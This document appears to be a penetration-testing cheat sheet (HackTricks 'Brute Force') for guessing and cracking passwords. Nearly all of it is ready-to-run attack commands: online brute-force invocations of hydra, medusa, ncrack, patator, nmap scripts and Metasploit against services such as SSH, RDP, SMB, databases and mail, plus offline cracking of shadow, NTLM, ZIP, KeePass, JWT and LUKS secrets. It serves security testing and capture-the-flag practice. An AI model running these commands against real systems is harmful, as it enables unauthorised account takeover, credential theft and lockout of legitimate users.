Brute Force - CheatSheet

https://book.hacktricks.xyz/brute-force

Wait a second, have you tried to use default credentials??

Search Google for default credentials of the technology in use, or try these links:

Service

Ordered alphabetically by service name.

AFP

nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run

AJP

nmap --script ajp-brute -p 8009 <IP>

Cassandra

nmap --script cassandra-brute -p 9160 <IP>

CouchDB

msf> use auxiliary/scanner/couchdb/couchdb_login

FTP

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

HTTP Generic Brute

HTTP Basic Auth

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10

HTTP - Post Form

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V

For HTTPS, change "http-post-form" to "https-post-form".

HTTP - CMS -- (W)ordpress, (J)oomla, (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com

IMAP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

LDAP

nmap --script ldap-brute -p 389 <IP>

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login

MySQL

hydra -L usernames.txt -P pass.txt <IP> mysql
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

OracleSQL

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#nmap fails sometimes for some reason executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

In order to use oracle_login with patator you need to install:

pip3 install cx_Oracle --upgrade

Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

PostgreSQL

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

PPTP

cat rockyou.txt | thc-pptp-bruter -u <Username> <IP>

RDP

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

Redis

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra -P /path/pass.txt <IP> redis

Rexec

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SNMP

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

SMTP

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL

SQL Server

#Use the NetBIOS name of the machine as domain
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could lock out accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can lock out accounts. If you have a domain, set it and use USE_WINDOWS_AUTHENT

SSH

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh

Telnet

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

VNC

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> -u root -P /root/Desktop/pass.txt -M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:<PORT>
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script vnc-brute -p <PORT> <IP>

Local

Online cracking databases

Check these before trying to brute-force a hash.

Generic

Hash-identifier

John

john --rule --wordlist=/usr/share/wordlists/rockyou.txt file_with_hash.txt

unshadow

unshadow passwd.txt shadow.txt > tojohn.txt

ZIP

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
zip2john file.zip > zip.john
john zip.john

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john

PDF

apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type it was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

JWT

git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John

NTLM cracking

Format: USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using a password
keepass2john -k <file-password> file.kdbx > hash #The keepass is also using a key file as a needed credential
#The keepass can use a password and/or a file as credentials; if it is using both you need to provide both to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash

LUKS image

Method 1

Install: https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Method 2

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 luckshash
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Mysql

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

Hash examples: https://openwall.info/wiki/john/sample-hashes

Hash-identifier

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including space
crunch 6 8 -t ,@@^^%%

Cewl

cewl --with-numbers -d 2 -m 5 -w words.txt http://$ip/

John mutation

Read /etc/john/john.conf and configure it

john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Cracking Linux Hashes - /etc/shadow file

  500 | md5crypt $1$, MD5(Unix)       | Operating-Systems
 3200 | bcrypt $2*$, Blowfish(Unix)   | Operating-Systems
 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems

Cracking Windows Hashes

 3000 | LM   | Operating-Systems
 1000 | NTLM | Operating-Systems

Cracking Common Application Hashes

  900 | MD4      | Raw Hash
    0 | MD5      | Raw Hash
 5100 | Half MD5 | Raw Hash
  100 | SHA1     | Raw Hash
10800 | SHA-384  | Raw Hash
 1400 | SHA-256  | Raw Hash
 1700 | SHA-512  | Raw Hash
